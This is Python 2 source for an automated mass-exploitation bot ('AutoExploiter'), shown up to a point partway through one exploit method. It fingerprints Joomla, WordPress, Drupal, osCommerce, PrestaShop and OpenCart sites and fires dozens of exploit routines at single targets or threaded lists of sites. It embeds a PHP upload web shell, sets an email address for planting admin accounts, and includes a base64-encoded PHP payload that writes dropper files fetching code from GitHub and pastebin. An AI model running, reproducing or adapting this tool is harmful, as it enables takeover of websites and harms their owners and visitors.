#!/usr/bin/python27import os, re, sys, socket, binascii, time, json, random, t

1. #!/usr/bin/python27
2. import os, re, sys, socket, binascii, time, json, random, threading
3. from Queue import Queue
4.  
5. try:
6. import requests
7. except ImportError:
8. print '---------------------------------------------------'
9. print '[*] pip install requests'
10. print ' [-] you need to install requests Module'
11. sys.exit()
12.  
13.  
14. class AutoExploiter(object):
15. def __init__(self):
16. try:
17. os.mkdir('result')
18. except:
19. pass
20. try:
21. os.mkdir('logs')
22. except:
23. pass
24. self.r = '\033[31m'
25. self.g = '\033[32m'
26. self.y = '\033[33m'
27. self.b = '\033[34m'
28. self.m = '\033[35m'
29. self.c = '\033[36m'
30. self.w = '\033[37m'
31. self.rr = '\033[39m'
32. self.shell_code = '''
33. <title>wordpress_project</title>
34. <?php
35. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
36. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
37. if( $_POST['_upl'] == "Upload" ) {
38. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
39. else { echo '<b>Not uploaded ! </b><br><br>'; }
40. }
41. ?>
42. '''
43. self.version = '1.5.1'
44. self.year = time.strftime("%y")
45. self.month = time.strftime("%m")
46. self.EMail = 'hacklinkhizmeti00@gmail.com' # --> add your email for Add admin, Password Will send to this EMail!
47. self.Jce_Deface_image = 'files/pwn.gif'
48. self._shell = 'files/shell.jpg'
49. self.indeX = 'files/index.jpg'
50. self.TextindeX = 'files/vuln.txt'
51. self.MailPoetZipShell = 'files/rock.zip'
52. self.ZipJd = 'files/jdownlods.zip'
53. self.pagelinesExploitShell = 'files/settings_auto.php'
54. self.jdShell = 'files/vuln.php3.j'
55. self.ShellPresta = 'files/up.php'
56. self.gravShell = 'files/grav.jpg'
57.  
58. try:
59. self.select = sys.argv[1]
60. except:
61. self.cls()
62. self.print_logo()
63. self.Print_options()
64. sys.exit()
65. if self.select == str('1'): # Single
66. self.cls()
67. self.print_logo()
68. self.Url = raw_input(self.r + ' [+]' + self.c + 'Enter Target: ' + self.y)
69. if self.Url.startswith("http://"):
70. self.Url = self.Url.replace("http://", "")
71. elif self.Url.startswith("https://"):
72. self.Url = self.Url.replace("https://", "")
73. else:
74. pass
75. try:
76. CheckOsc = requests.get('http://' + self.Url + '/admin/images/cal_date_over.gif', timeout=10)
77. CheckOsc2 = requests.get('http://' + self.Url + '/admin/login.php', timeout=10)
78. CheckCMS = requests.get('http://' + self.Url + '/templates/system/css/system.css', timeout=5)
79. Checktwo = requests.get('http://' + self.Url, timeout=5)
80. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
81. self.Print_Scanning(self.Url, 'joomla')
82. self.RCE_Joomla(self.Url)
83. self.Joomla_TakeADmin(self.Url)
84. self.Com_AdsManager_Shell(self.Url)
85. self.alberghiExploit(self.Url)
86. self.Com_CCkJseblod(self.Url)
87. self.Com_Fabric(self.Url)
88. self.Com_Hdflvplayer(self.Url)
89. self.Com_Jdownloads_shell(self.Url)
90. self.Com_Joomanager(self.Url)
91. self.Com_MyBlog(self.Url)
92. self.Com_Macgallery(self.Url)
93. self.JCE_shell(self.Url)
94. self.Com_s5_media_player(self.Url)
95. self.Com_Jbcatalog(self.Url)
96. self.Com_SexyContactform(self.Url)
97. self.Com_rokdownloads(self.Url)
98. self.Com_extplorer(self.Url)
99. self.Com_jwallpapers_Shell(self.Url)
100. self.Com_facileforms(self.Url)
101. self.JooMLaBruteForce(self.Url)
102. self.FckEditor(self.Url)
103. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
104. self.Print_Scanning(self.Url, 'Wordpress')
105. self.Revslider_SHELL(self.Url)
106. self.wysijaExploit(self.Url)
107. self.WP_User_Frontend(self.Url)
108. self.Gravity_Forms_Shell(self.Url)
109. self.HD_WebPlayerSqli(self.Url)
110. self.pagelinesExploit(self.Url)
111. self.HeadWayThemeExploit(self.Url)
112. self.addblockblocker(self.Url)
113. self.cherry_plugin(self.Url)
114. self.formcraftExploit_Shell(self.Url)
115. self.UserProExploit(self.Url)
116. self.wp_mobile_detector(self.Url)
117. self.Wp_Job_Manager(self.Url)
118. self.wp_content_injection(self.Url)
119. self.Woocomrece(self.Url)
120. self.viral_optins(self.Url)
121. self.CateGory_page_icons(self.Url)
122. self.Downloads_Manager(self.Url)
123. self.wp_support_plus_responsive_ticket_system(self.Url)
124. self.wp_miniaudioplayer(self.Url)
125. self.eshop_magic(self.Url)
126. self.ungallery(self.Url)
127. self.barclaycart(self.Url)
128. self.FckEditor(self.Url)
129. elif '/sites/default/' in Checktwo.text.encode('utf-8')\
130. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
131. self.Print_Scanning(self.Url, 'drupal')
132. self.DrupalGedden2(self.Url)
133. self.DrupalBruteForce(self.Url)
134. self.Drupal_Sqli_Addadmin(self.Url)
135.  
136. self.FckEditor(self.Url)
137. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
138. self.Print_Scanning(self.Url, 'osCommerce')
139. self.osCommerce(self.Url)
140. self.FckEditor(self.Url)
141. elif 'prestashop' in Checktwo.text.encode('utf-8'):
142. self.lib(self.Url)
143. self.psmodthemeoptionpanel(self.Url)
144. self.tdpsthemeoptionpanel(self.Url)
145. self.megamenu(self.Url)
146. self.nvn_export_orders(self.Url)
147. self.pk_flexmenu(self.Url)
148. self.wdoptionpanel(self.Url)
149. self.fieldvmegamenu(self.Url)
150. self.wg24themeadministration(self.Url)
151. self.videostab(self.Url)
152. self.cartabandonmentproOld(self.Url)
153. self.cartabandonmentpro(self.Url)
154. self.advancedslider(self.Url)
155. self.attributewizardpro_x(self.Url)
156. self.attributewizardpro3(self.Url)
157. self.attributewizardpro2(self.Url)
158. self.attributewizardpro(self.Url)
159. self.jro_homepageadvertise(self.Url)
160. self.homepageadvertise2(self.Url)
161. self.homepageadvertise(self.Url)
162. self.productpageadverts(self.Url)
163. self.simpleslideshow(self.Url)
164. self.vtermslideshow(self.Url)
165. self.soopabanners(self.Url)
166. self.soopamobile(self.Url)
167. self.columnadverts(self.Url)
168. self.FckEditor(self.Url)
169. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
170. self.OpenCart(self.Url)
171. self.FckEditor(self.Url)
172. else:
173. self.Print_Scanning(self.Url, 'Unknown')
174. self.FckEditor(self.Url)
175. except:
176. self.Timeout(self.Url)
177. sys.exit()
178.  
179.  
180. elif self.select == str('2'): # multi List
181. self.cls()
182. try:
183. self.print_logo()
184. Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
185. with open(Get_list, 'r') as zz:
186. Readlist = zz.read().splitlines()
187. except IOError:
188. print self.r + '--------------------------------------------'
189. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
190. sys.exit()
191. thread = []
192. for xx in Readlist:
193. t = threading.Thread(target=self.Work2, args=(xx, ''))
194. t.start()
195. thread.append(t)
196. time.sleep(0.1)
197. for j in thread:
198. j.join()
199. elif self.select == str('4'):
200. try:
201. self.cls()
202. self.print_logo()
203. GoT = requests.get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/update.txt', timeout=5)
204. if self.version in GoT.text.encode('utf-8'):
205. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c +\
206. "Sorry But You Don't Have New Update ... Try later."
207. else:
208. Loop = True
209. print self.r + ' [' + self.c + '+' + self.r + '] ' + self.g + 'update Is available! Update Now.'
210. print self.r + ' [' + self.c + '+' + self.r + '] ' + self.y + 'github.com/04x/ICG-AutoExploiterBoT/\n'
211. while Loop:
212. Get = raw_input(self.r + ' [' + self.g + '*' + self.r + '] ' + self.c +
213. 'You Want know What is New in New Version ? [y]es or [n]o : ')
214. if Get == str('y'):
215. update_details = requests.get('https://raw.githubusercontent.com/'
216. '04x/ICG-AutoExploiterBoT/master/files/update_details.txt', timeout=5)
217. print update_details.text.encode('utf-8')
218. Loop = False
219. elif Get == str('n'):
220. self.cls()
221. self.print_logo()
222. Loop = False
223. else:
224. continue
225. except:
226. self.Timeout('Github.com')
227. elif self.select == str('3'):
228. self.cls()
229. self.print_logo()
230. self.concurrent = 75
231. try:
232. self.Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
233. except IOError:
234. print self.r + '--------------------------------------------'
235. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
236. sys.exit()
237. self.q = Queue(self.concurrent * 2)
238. for i in range(self.concurrent):
239. self.t = threading.Thread(target=self.doWork)
240. self.t.daemon = True
241. self.t.start()
242. try:
243. for url in open(self.Get_list):
244. self.q.put(url.strip())
245. self.q.join()
246. except:
247. pass
248.  
249. else:
250. self.cls()
251. self.print_logo()
252. print self.r + '--------------------------------------------'
253. print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + ' Option Not Found! Try Again...'
254.  
255.  
256. # elif self.select == str(3): # IP Server
257. # self.cls()
258. # IPserv = raw_input(' Enter IP server: ')
259. # reverse = reverse_ipz()
260. # reverse.Reverse_ip(IPserv)
261. # try:
262. # with open('logs/' + reverse.ip + '.txt', 'r') as reader:
263. # readlines = reader.read().splitlines()
264. # except:
265. # print ' i cant Find List of urls in server! use from option 2.'
266. # sys.exit()
267. # for xx in readlines:
268. # self.Url = xx
269. # if self.Url.startswith("http://"):
270. # self.Url = self.Url.replace("http://", "")
271. # elif self.Url.startswith("https://"):
272. # self.Url = self.Url.replace("https://", "")
273. # else:
274. # pass
275. # try:
276. # CheckCMS = requests.get('http://' + self.Url + '/language/en-GB/en-GB.xml', timeout=7)
277. # if 'version="' in CheckCMS.text.encode('utf-8'):
278. # self.Print_Scanning(self.Url, 'joomla')
279. # self.RCE_Joomla()
280. # self.Joomla_TakeADmin()
281. # self.Com_AdsManager_Shell()
282. # self.alberghiExploit()
283. # self.Com_CCkJseblod()
284. # self.Com_Fabric()
285. # self.Com_Hdflvplayer()
286. # self.Com_Jdownloads_shell()
287. # self.Com_Joomanager()
288. # self.Com_MyBlog()
289. # self.Com_Macgallery()
290. # self.JCE_shell()
291. # self.Com_s5_media_player()
292. # else:
293. # self.Print_Scanning(self.Url, 'Unknown')
294. # except requests.ConnectionError:
295. # self.Timeout(self.Url)
296.  
297.  
298.  
299. def Work2(self, url, s):
300. try:
301. if url.startswith("http://"):
302. url = url.replace("http://", "")
303. elif url.startswith("https://"):
304. url = url.replace("https://", "")
305. else:
306. pass
307. CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
308. CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
309. CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
310. Checktwo = requests.get('http://' + url, timeout=5)
311. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
312. self.RCE_Joomla(url)
313. self.Joomla_TakeADmin(url)
314. self.Com_AdsManager_Shell(url)
315. self.alberghiExploit(url)
316. self.Com_CCkJseblod(url)
317. self.Com_Fabric(url)
318. self.Com_Hdflvplayer(url)
319. self.Com_Jdownloads_shell(url)
320. self.Com_Joomanager(url)
321. self.Com_MyBlog(url)
322. self.Com_Macgallery(url)
323. self.JCE_shell(url)
324. self.Com_s5_media_player(url)
325. self.Com_Jbcatalog(url)
326. self.Com_SexyContactform(url)
327. self.Com_rokdownloads(url)
328. self.Com_extplorer(url)
329. self.Com_jwallpapers_Shell(url)
330. self.Com_facileforms(url)
331. self.JooMLaBruteForce(url)
332. self.FckEditor(url)
333. self.q.task_done()
334. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
335. self.Revslider_SHELL(url)
336. self.wysijaExploit(url)
337. self.WP_User_Frontend(url)
338. self.Gravity_Forms_Shell(url)
339. self.HD_WebPlayerSqli(url)
340. self.pagelinesExploit(url)
341. self.HeadWayThemeExploit(url)
342. self.addblockblocker(url)
343. self.cherry_plugin(url)
344. self.formcraftExploit_Shell(url)
345. self.UserProExploit(url)
346. self.wp_mobile_detector(url)
347. self.Wp_Job_Manager(url)
348. self.wp_content_injection(url)
349. self.viral_optins(url)
350. self.Woocomrece(url)
351. self.CateGory_page_icons(url)
352. self.Downloads_Manager(url)
353. self.wp_support_plus_responsive_ticket_system(url)
354. self.wp_miniaudioplayer(url)
355. self.eshop_magic(url)
356. self.ungallery(url)
357. self.barclaycart(url)
358. self.FckEditor(url)
359. self.q.task_done()
360. elif '/sites/default/' in Checktwo.text.encode('utf-8') \
361. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
362. self.Drupal_Sqli_Addadmin(url)
363. self.DrupalGedden2(url)
364. self.DrupalBruteForce(url)
365. self.FckEditor(url)
366. self.q.task_done()
367. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
368. self.osCommerce(url)
369. self.FckEditor(url)
370. self.q.task_done()
371. elif 'prestashop' in Checktwo.text.encode('utf-8'):
372. self.lib(url)
373. self.psmodthemeoptionpanel(url)
374. self.tdpsthemeoptionpanel(url)
375. self.megamenu(url)
376. self.nvn_export_orders(url)
377. self.pk_flexmenu(url)
378. self.wdoptionpanel(url)
379. self.fieldvmegamenu(url)
380. self.wg24themeadministration(url)
381. self.videostab(url)
382. self.cartabandonmentproOld(url)
383. self.cartabandonmentpro(url)
384. self.advancedslider(url)
385. self.attributewizardpro_x(url)
386. self.attributewizardpro3(url)
387. self.attributewizardpro2(url)
388. self.attributewizardpro(url)
389. self.jro_homepageadvertise(url)
390. self.homepageadvertise2(url)
391. self.homepageadvertise(url)
392. self.productpageadverts(url)
393. self.simpleslideshow(url)
394. self.vtermslideshow(url)
395. self.soopabanners(url)
396. self.soopamobile(url)
397. self.columnadverts(url)
398. self.FckEditor(url)
399. self.q.task_done()
400. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
401. self.OpenCart(self.Url)
402. self.FckEditor(self.Url)
403. self.q.task_done()
404. else:
405. self.FckEditor(url)
406. self.q.task_done()
407. except:
408. pass
409. def doWork(self):
410. try:
411. while True:
412. url = self.q.get()
413. if url.startswith('http://'):
414. url = url.replace('http://', '')
415. elif url.startswith("https://"):
416. url = url.replace('https://', '')
417. else:
418. pass
419. try:
420. CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
421. CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
422. CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
423. Checktwo = requests.get('http://' + url, timeout=5)
424. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
425. self.RCE_Joomla(url)
426. self.Joomla_TakeADmin(url)
427. self.Com_AdsManager_Shell(url)
428. self.alberghiExploit(url)
429. self.Com_CCkJseblod(url)
430. self.Com_Fabric(url)
431. self.Com_Hdflvplayer(url)
432. self.Com_Jdownloads_shell(url)
433. self.Com_Joomanager(url)
434. self.Com_MyBlog(url)
435. self.Com_Macgallery(url)
436. self.JCE_shell(url)
437. self.Com_s5_media_player(url)
438. self.Com_Jbcatalog(url)
439. self.Com_SexyContactform(url)
440. self.Com_rokdownloads(url)
441. self.Com_extplorer(url)
442. self.Com_jwallpapers_Shell(url)
443. self.Com_facileforms(url)
444. self.JooMLaBruteForce(url)
445. self.FckEditor(url)
446. self.q.task_done()
447. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
448. self.Revslider_SHELL(url)
449. self.wysijaExploit(url)
450. self.WP_User_Frontend(url)
451. self.Gravity_Forms_Shell(url)
452. self.HD_WebPlayerSqli(url)
453. self.pagelinesExploit(url)
454. self.HeadWayThemeExploit(url)
455. self.addblockblocker(url)
456. self.cherry_plugin(url)
457. self.formcraftExploit_Shell(url)
458. self.UserProExploit(url)
459. self.wp_mobile_detector(url)
460. self.Wp_Job_Manager(url)
461. self.wp_content_injection(url)
462. self.viral_optins(url)
463. self.Woocomrece(url)
464. self.CateGory_page_icons(url)
465. self.Downloads_Manager(url)
466. self.wp_support_plus_responsive_ticket_system(url)
467. self.wp_miniaudioplayer(url)
468. self.eshop_magic(url)
469. self.ungallery(url)
470. self.barclaycart(url)
471. self.FckEditor(url)
472. self.q.task_done()
473. elif '/sites/default/' in Checktwo.text.encode('utf-8') \
474. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
475. self.Drupal_Sqli_Addadmin(url)
476. self.DrupalGedden2(url)
477. self.DrupalBruteForce(url)
478. self.FckEditor(url)
479. self.q.task_done()
480. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
481. self.osCommerce(url)
482. self.FckEditor(url)
483. self.q.task_done()
484. elif 'prestashop' in Checktwo.text.encode('utf-8'):
485. self.lib(url)
486. self.psmodthemeoptionpanel(url)
487. self.tdpsthemeoptionpanel(url)
488. self.megamenu(url)
489. self.nvn_export_orders(url)
490. self.pk_flexmenu(url)
491. self.wdoptionpanel(url)
492. self.fieldvmegamenu(url)
493. self.wg24themeadministration(url)
494. self.videostab(url)
495. self.cartabandonmentproOld(url)
496. self.cartabandonmentpro(url)
497. self.advancedslider(url)
498. self.attributewizardpro_x(url)
499. self.attributewizardpro3(url)
500. self.attributewizardpro2(url)
501. self.attributewizardpro(url)
502. self.jro_homepageadvertise(url)
503. self.homepageadvertise2(url)
504. self.homepageadvertise(url)
505. self.productpageadverts(url)
506. self.simpleslideshow(url)
507. self.vtermslideshow(url)
508. self.soopabanners(url)
509. self.soopamobile(url)
510. self.columnadverts(url)
511. self.FckEditor(url)
512. self.q.task_done()
513. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
514. self.OpenCart(self.Url)
515. self.FckEditor(self.Url)
516. self.q.task_done()
517. else:
518. self.FckEditor(url)
519. self.q.task_done()
520. except:
521. pass
522. except:
523. pass
524.  
525.  
526.  
527. def print_logo(self):
528. clear = "\x1b[0m"
529. colors = [36, 32, 34, 35, 31, 37]
530.  
531. x = """
532.  
533.  
534. White HaT Hackers
535. _ ______ _ _ _
536. /\ | | | ____| | | (_) |
537. / \ _ _| |_ ___ | |__ __ ___ __ | | ___ _| |_ ___ _ __
538. / /\ \| | | | __/ _ \| __| \ \/ / '_ \| |/ _ \| | __/ _ \ '__|
539. / ____ \ |_| | || (_) | |____ > <| |_) | | (_) | | || __/ |
540. /_/ \_\__,_|\__\___/|______/_/\_\ .__/|_|\___/|_|\__\___|_|
541. | |
542. IRan-Cyber.Net |_| gitHub.com/04x
543.  
544. Note! : We don't Accept any responsibility for any illegal usage.
545. """
546. for N, line in enumerate(x.split("\n")):
547. sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
548. time.sleep(0.05)
549.  
550. def Print_options(self):
551. print self.r + ' [' + self.y + '1' + self.r + '] ' + self.c + 'Single Target' + self.w +\
552. ' [ ' + 'python AutoExploit.py 1' + ' ]'
553. print self.r + ' [' + self.y + '2' + self.r + '] ' + self.c + 'List Scan' + self.w + ' [ ' + 'python AutoExploit.py 2' + ' ]'
554. print self.r + ' [' + self.y + '3' + self.r + '] ' + self.c + 'Thread List Scan' + self.w + ' [ ' + 'python AutoExploit.py 3' + ' ]'
555. print self.r + ' [' + self.y + '4' + self.r + '] ' + self.c + 'Check Update' + self.w + ' [ ' + 'python AutoExploit.py 4' + ' ]'
556.  
557.  
558.  
559. def Print_Scanning(self, url, CMS):
560. print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + url + self.w + ' [ ' + CMS + ' ]'
561.  
562.  
563. def Timeout(self, url):
564. print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + url + self.r + ' [ TimeOut!!/NotValid Url ]'
565.  
566. def Print_NotVuln(self, NameVuln, site):
567. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.c + ' [Not Vuln]'
568.  
569. def Print_Username_Password(self, username, Password):
570. print self.y + ' [' + self.c + '+' + self.y + '] ' + self.c + 'Username: ' + self.g + username
571. print self.y + ' [' + self.c + '+' + self.y + '] ' + self.c + 'Password: ' + self.g + Password
572.  
573.  
574. def Print_Vuln(self, NameVuln, site):
575. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.g + ' [Vuln!!]'
576.  
577. def Print_Vuln_index(self, indexPath):
578. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + indexPath + self.g + ' [Index Uploaded!]'
579.  
580. def Print_vuln_Shell(self, shellPath):
581. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + shellPath + self.g + ' [Shell Uploaded!]'
582.  
583. def Print_vuln_Config(self, pathconfig):
584. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + pathconfig + self.g + ' [Config Downloaded!]'
585.  
586.  
587. def cls(self):
588. linux = 'clear'
589. windows = 'cls'
590. os.system([linux, windows][os.name == 'nt'])
591.  
592. def RCE_Joomla(self, site):
593. try:
594. pl = self.generate_payload(
595. "base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdG1wL3Z1bG4yLnBocCIgOw0KJGZwPWZvcGVuKCIkY2hlY2siLCJ3KyIpOw0KZndyaXRlKCRmcCxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtWjFibU4wYVc5dUlHaDBkSEJmWjJWMEtDUjFjbXdwZXcwS0NTUnBiU0E5SUdOMWNteGZhVzVwZENna2RYSnNLVHNOQ2dsamRYSnNYM05sZEc5d2RDZ2thVzBzSUVOVlVreFBVRlJmVWtWVVZWSk9WRkpCVGxOR1JWSXNJREVwT3cwS0NXTjFjbXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5RFQwNU9SVU5VVkVsTlJVOVZWQ3dnTVRBcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOUdUMHhNVDFkTVQwTkJWRWxQVGl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYMGhGUVVSRlVpd2dNQ2s3RFFvSmNtVjBkWEp1SUdOMWNteGZaWGhsWXlna2FXMHBPdzBLQ1dOMWNteGZZMnh2YzJVb0pHbHRLVHNOQ24wTkNpUmphR1ZqYXlBOUlDUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMM1J0Y0M5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0hNNkx5OXlZWGN1WjJsMGFIVmlkWE5sY21OdmJuUmxiblF1WTI5dEx6QTBlQzlKUTBjdFFYVjBiMFY0Y0d4dmFYUmxja0p2VkM5dFlYTjBaWEl2Wm1sc1pYTXZkWEF1Y0dod0p5azdEUW9rYjNCbGJpQTlJR1p2Y0dWdUtDUmphR1ZqYXl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJpd2dKSFJsZUhRcE93MEtabU5zYjNObEtDUnZjR1Z1S1RzTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSamFHVmpheWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTGlJOEwySnlQaUk3RFFwOVpXeHpaU0FOQ2lBZ1pXTm9ieUFpYm05MElHVjRhWFJ6SWpzTkNtVmphRzhnSW1SdmJtVWdMbHh1SUNJZ093MEtKR05vWldOck1pQTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJsdFlXZGxjeTkyZFd4dUxuQm9jQ0lnT3cwS0pIUmxlSFF5SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNtRjNMbWRwZEdoMVluVnpaWEpqYjI1MFpXNTBMbU52YlM4d05IZ3ZTVU5ITFVGMWRHOUZlSEJzYjJsMFpYSkNiMVF2YldGemRHVnlMMlpwYkdWekwzVndMbkJvY0NjcE93MEtKRzl3Wlc0eUlEMGdabTl3Wlc0b0pHTm9aV05yTWl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJqSXNJQ1IwWlhoME1pazdEUXBtWTJ4dmMyVW9KRzl3Wlc0eUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXpJcEtYc05DaUFnSUNCbFkyaHZJQ1JqYUdWamF6SXVJand2WW5JK0lqc05DbjFsYkhObElBMEtJQ0JsWTJodklDSnViM1FnWlhocGRITXlJanNOQ21WamFHOGdJbVJ2Ym1VeUlDNWNiaUFpSURzTkNnMEtKR05vWldOck16MGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTkyZFd4dUxtaDBiU0lnT3cwS0pIUmxlSFF6SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk4NE9EQjFabUZYUmljcE93MEtKRzl3TXoxbWIzQmxiaWdrWTJobFkyc3pMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRE1zSkhSbGVIUXpLVHNOQ21aamJHOXpaU2drYjNBektUc05DZzBLRFFva1kyaGxZMnMyUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhRMklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d05qMW1iM0JsYmlna1kyaGxZMnMyTENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RZc0pIUmxlSFEyS1RzTkNtWmpiRzl6WlNna2IzQTJLVHNOQ2o4KycpKTsNCmZjbG9zZSgkZnApOw0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2ltYWdlcy92dWxuMi5waHAiIDsNCiRmcDI9Zm9wZW4oIiRjaGVjazIiLCJ3KyIpOw0KZndyaXRlKCRmcDIsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDNSdGNDOTJkV3h1TG5Cb2NDSWdPdzBLSkhSbGVIUWdQU0JvZEhSd1gyZGxkQ2duYUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMekEwZUM5SlEwY3RRWFYwYjBWNGNHeHZhWFJsY2tKdlZDOXRZWE4wWlhJdlptbHNaWE12ZFhBdWNHaHdKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjbUYzTG1kcGRHaDFZblZ6WlhKamIyNTBaVzUwTG1OdmJTOHdOSGd2U1VOSExVRjFkRzlGZUhCc2IybDBaWEpDYjFRdmJXRnpkR1Z5TDJacGJHVnpMM1Z3TG5Cb2NDY3BPdzBLSkc5d1pXNHlJRDBnWm05d1pXNG9KR05vWldOck1pd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaklzSUNSMFpYaDBNaWs3RFFwbVkyeHZjMlVvSkc5d1pXNHlLVHNOQ21sbUtHWnBiR1ZmWlhocGMzUnpLQ1JqYUdWamF6SXBLWHNOQ2lBZ0lDQmxZMmh2SUNSamFHVmphekl1SWp3dlluSStJanNOQ24xbGJITmxJQTBLSUNCbFkyaHZJQ0p1YjNRZ1pYaHBkSE15SWpzTkNtVmphRzhnSW1SdmJtVXlJQzVjYmlBaUlEc05DZzBLSkdOb1pXTnJNejBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5MmRXeHVMb